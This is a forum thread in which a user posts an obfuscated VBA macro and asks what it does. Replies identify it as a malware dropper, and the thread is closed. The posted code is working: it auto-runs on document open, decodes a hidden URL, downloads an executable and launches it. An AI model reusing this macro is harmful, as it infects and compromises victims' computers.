WTF is this

07/12/2016 23:02 md88#1
Could someone explain me what the hell this is ?


Code:
'zFFBhAywllRgYLnoyKnKmCEyXDmEJs

'YhbETcJPctoxcTJ
'HRAgYsJHKEVuoDioyKnKmCEyXDmEJsHRAgYsJHKEVuoDi


#If VBA7 Then
Private Declare PtrSafe Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiGkgFgFpjtlINQFBn As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal JxdCDRaNebsfgXLkgFgFpjtlINQFBn As Long, ByVal gaIQkTeNYYLjYGq As String, ByVal kgFgFpjtlINQFBnMDbSYnftqLuMOTJ As String, ByVal pmkorfc As Long, ByVal plkmdirfv As Long) As Long
Private Declare PtrSafe Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "RegQueryInfoKeyA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function dYBGNWPziVIPQCj Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
#Else
Private Declare Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
Private Declare Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal vLOdwEFwafDnIbw As Long, ByVal dpdorjn As String, ByVal rdftemwe As String, ByVal xplmcdy As Long, ByVal eumwxwB As Long) As Long
Private Declare Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
#End If

Private Sub wszKXDPkxrXLoWh()
QhmRMKLkFEYXdnU = "mRhSfNkyegBMpP"
End Sub
Function sxAbpheDixNfjMi(ByVal bohfkYHcsSmRypP As String, ByVal KpNPSPEzzcDEpEv As String)
If PdwMOlUSjYZJDve = "mYptUoNfGKYpOiX" Then
dNCZZWvBkfROnQk = "FIlvLVSNrrandHU"
'FIlvLVSNrrandHU = "PdwMOlUSjYZJDveFIlvLVSNrrandHU"
End If
sJHTZIrjjbBUYp 0 + 2 + 2 - 4, bohfkYHcsSmRypP, KpNPSPEzzcDEpEv, 0 + 0, 4 - 4
'rKQeVikQmQxHoyy=EEvpNwavWLbZEOd
End Function
Sub Auto_Open()
fJcsnuRFbMbAWqL
End Sub
Sub AutoOpen()
fJcsnuRFbMbAWqL
End Sub
Private Function eMuOewCUhqUazqc(IEldtrDuGlkTjRT)
pkvkfkwruDSKyXdFIlvLVSNrrandHU = vQNuqEpwzAzoWuv
  eMuOewCUhqUazqc = StrReverse(IEldtrDuGlkTjRT)
If pkvkfkwruDSKyXd = vQNuqEpwzAzoWuvFIlvLVSNrrandHU Then vQNuqEpwzAzoWuv = OjEnDLxzLiRxGol
End Function
Private Sub fJcsnuRFbMbAWqL()
IVrmWSZgkUIOwZ = RIQWyisqGzGHpy
fEdbtuhFCrgIXL = eMuOewCUhqUazqc(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(122) + Chr(98) + Chr(120) + Chr(114) + Chr(108) + Chr(122) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104))
If zMNdXbbdNuJUbEu = "DcJZgxAGXUDDlmr" Then
jtVjkqpGpcysKoD = "YbcoZcZQEYswNAK"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
End If
ZjJyWaHzvkqXNmr = eMuOewCUhqUazqc("lvpc.rvvxwwze")
clQJsXVNmotrVpy = Environ$(Chr(20# + 20# + 30# + 14# + 500# - 500# + 200 - 200) + Chr(80# - 3 + 1# - 1# + 1000# - 1000#) + Chr(40 + 30 + 5 + 5 + 1 + 1 - 2)) + Chr(100# - 8# - 2# + 2#) & ZjJyWaHzvkqXNmr
If pquAZkgqTYOLNqc = "sOGjTHbiIwwUOro" Then
qdeyujadPFejHEM = "dTBpTWfAJNOBjj"
End If
PbnASKbkgjcWPUV = "bygMYYbaqHeSabO"
SGHLCIzJxRDTSPp = "vGPNCFVxBLIntIx"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
sxAbpheDixNfjMi fEdbtuhFCrgIXL, clQJsXVNmotrVpy
Call Shell(clQJsXVNmotrVpy, vbNormalFocus)
End Sub
Sub Workbook_Open()
fJcsnuRFbMbAWqL
End Sub
that "should" generate a username and a password. but i dont trust in it.
07/12/2016 23:24 algernong#2
It downloads and executes a binary.

Edit: This is the file it downloads:
Code:
-deleted
Edit: [Only registered and activated users can see links. Click Here To Register...]
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
07/13/2016 00:13 florian0#3
Quote:
Originally Posted by algernong View Post
Edit: This is the file it downloads:
Code:
-deleted
[...]
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
This binary identifies as "wextract", a malware-dropper from 2008. Somebody really put some effort into undetecting this old piece. ;D
07/13/2016 08:02 md88#4
Okay, ty guys
07/13/2016 09:39 Devsome#5
#closed - problem solved + DL deleted